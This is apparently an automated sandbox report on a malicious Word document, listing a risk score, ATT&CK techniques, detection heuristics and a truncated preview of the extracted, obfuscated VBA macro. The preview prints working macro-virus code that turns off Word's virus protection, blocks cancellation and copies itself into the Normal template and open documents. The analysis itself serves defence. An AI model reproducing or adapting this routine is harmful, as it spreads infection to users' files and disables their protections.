MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is automatically executed upon opening the document, as indicated by the Document_Open macro firing. The ClamAV detection name 'Win.Trojan.W97M-8' strongly suggests this is a macro-based malware dropper. The VBA code itself appears heavily obfuscated, but its presence and the heuristic firings confirm the malicious intent to execute arbitrary code, likely for downloading further malicious content.
Heuristics 3
-
ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.W97M-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 83337 bytes |
SHA-256: b6b060583bed0b013dd0c28257b6c1939cb02fcf6b7c259584d3667707a01030 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ºž¦øŒûŠÝ‘ªŠ§ºÞ—�Ýúø¦ª…Ì¡ÀÏ’�ÈÑ÷›¶®Ê£øˆœØ = "òßí¾˜¢®–†¾Ýåê" ¡áôÈ÷ëšß±�œ““«çè¤Â͆È⛋¯Êæï«Â�ÃÙ¹ = "¡„¨¥‘ù�”Åð" ×Ö¤žªÑ¶�ß’Ë´°À„º ²Œæ°Øäœê©ÐÆÄ©¥¿Å¹Õ™©‘† = "®Ï†‡¥Ö½›˜è²Ýðæë¯" ÔÑ…ÂÅ™Üã½�áŸú—™£Ä©Ýä‡Öæ§ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúŒã«òÑâ¨ð˜ = "¼±»ã©—îò¹¡â¦–Ì" ޣل⿈�²„Œè¯çа®¦ßŠ«§Ï›âÕʆ¼ìÍÐÏ = "ˉțꋇðݼ¯�ŠàÁ Ò" Ëã§“ÜÖ“Ìç—¬¸Ÿ…š˜›�⿺˜ôì§™ÜÓɨ޿ = "®§Éá„Â" ÈúôªòÎú¸À‹ÞˆÊ™»×»ìéɸ Ö”úù™›æóªŠ¼©ÒըЄóàŒ”œ‰èõáÔ™§±¸ = "ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѽ®…ñµ�ÖÖ" ¦‚ŠÁêɦµÙ¿ ò¤çïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¬ÁÚ†¿èòÇ’‚ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú너䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ„Ô݉™¯Õè´ÓÖ±¤ = "àßÓ×›Â�½±„„“�Ê�" ¬Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí�ÊÔžºæ¹„À�ó”°µ™ñփׇτ‚õí“‘»£ðÂÆ¤”Ì‹ÈàÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú‚Î…Ö¼âŸÎ�¡¤¾šÉ¡ä̛ŦËé = "”ëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÅò" Çôû«åÔšÅÇÉìÀ¼¡ÃË´�ÀšŸªÈØÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú®½Úá°”¾ÛšÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúÞÅ”ÏÁÅ� = "íéæùÊ›À‘„Ù»ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúã" ª”ßÒ�˨ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑáÑŸúť䉵鹇‡‹¾Á‡½¼Ú‚¦ = "²�Ѳ‚–ܡ츔½ÏÓÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú" Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…Óîˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèч£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ÊÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúï® = "�ºÙª" ߋȮ‚Î…Ö¼âŸÎÏŠøô†ÌŸ¡¾¹ùŠˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ™Ýà–ß݃ӉÝç„…ì½àë = "»ïˆ˜®Ëð©ƒ�¯§�£Ô" ’èГ†ùàÆ�’›…„§¯®»½éº = "¡›ê´ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆Æèѹó‹™×ï²ðˆ" ÇéÛêÝô¨í‚¸ô‡ËÆèç¹Ù�êۈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÒ쵚„Þ = "ƒÞ‡á±¥ª" ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈéµùÌÛ–ò”Ä = "§‚Î…Ö¼âŸÎ“ö•éצµ¾„§®ë" ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈ鵯Î֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ÚôÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†Þ¨è¸–ÐÔžºæ¹„À�ó”°µ™ñփׇτ‚õíòÙ = "¦ÜßçÅÀÏ‘¯�¨Ë�" Ýå ‚Î…Ö¼âŸÎê«à˜°ÈÉïˆÍž•ó‘ò’¼Ïëˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѪʈ䕅±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѺ¬ªÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‚ëØ¸ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúµÙ¢Éó Žð臽¿‹Œ×ê÷•¨ = "�×Ö¤žªÑ¶�ߒ˘°êÂÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúâÞߨë‰É¢ãã¡æÔžºæ¹„À�ó”°µ™ñփׇτ‚õíÎãŒÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊúìÙÍ¢¹ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑêæÆ¡Û" ƒÛÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†ö½½öù–‚Î…Ö¼âŸÎ‚Î…Ö¼âŸÎ¼ÚìÜèÈ鵯¨åÚ¥ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¢Ôº‚Î…Ö¼âŸÎï = "´˜ÄÔžºæ¹„À�ó”°µ™ñփׇτ‚õíŸÂõ§ö¢ïç" ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines Application.Options.VirusProtection = False Application.EnableCancelKey = wdCancelDisabled WordBasic.DisableAutoMacros 0 Options.SaveNormalPrompt = False If ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ > 169 And ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then Exit Sub If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú > 169 Then Set ó Žð臽¿‹Œ×ê÷• = ActiveDocument Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = NormalTemplate GoTo •à˜°ÈÉïˆÍž•ó‘ò’¼Ïë欀 ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å End If If ÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú < 170 Then Set ó Žð臽¿‹Œ×ê÷• = NormalTemplate Set ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢ = ActiveDocument End If ReDim ÖÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†¦šˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèѾÆëÝæ³ˆ³–¦Ôžºæ¹„À�ó”°µ™ñփׇτ‚õí“ð¥ÅÅéß(50, 50) ‚Î…Ö¼âŸÎ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.countoflines ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = 0 Do Until ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ‚Î…Ö¼âŸÎ ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ = ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ + 1 Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = ø†½É²ôîò�¹à¢…õ¬úæ»úÀº¢.VBProject.VBComponents(1).CodeModule.Lines(ˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑ, 1) If Left(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 1) = "'" Then èêÀ = Len(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸) Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸ = Mid(Ðäǯ¾ïÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú�…ÓîÆÎ֥Įƴ¾˜Ó·�ÎÒ§ÒãëÊú¯±áÌ„õ‰†‡£¥ƒˆä•…±Ä‚퓎΂ö®ÍÔ×ÆÌ…¥Ê㉆ÆèÑÕ×½¸, 2, èêÀ) ™Ý¾õˆä•… ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.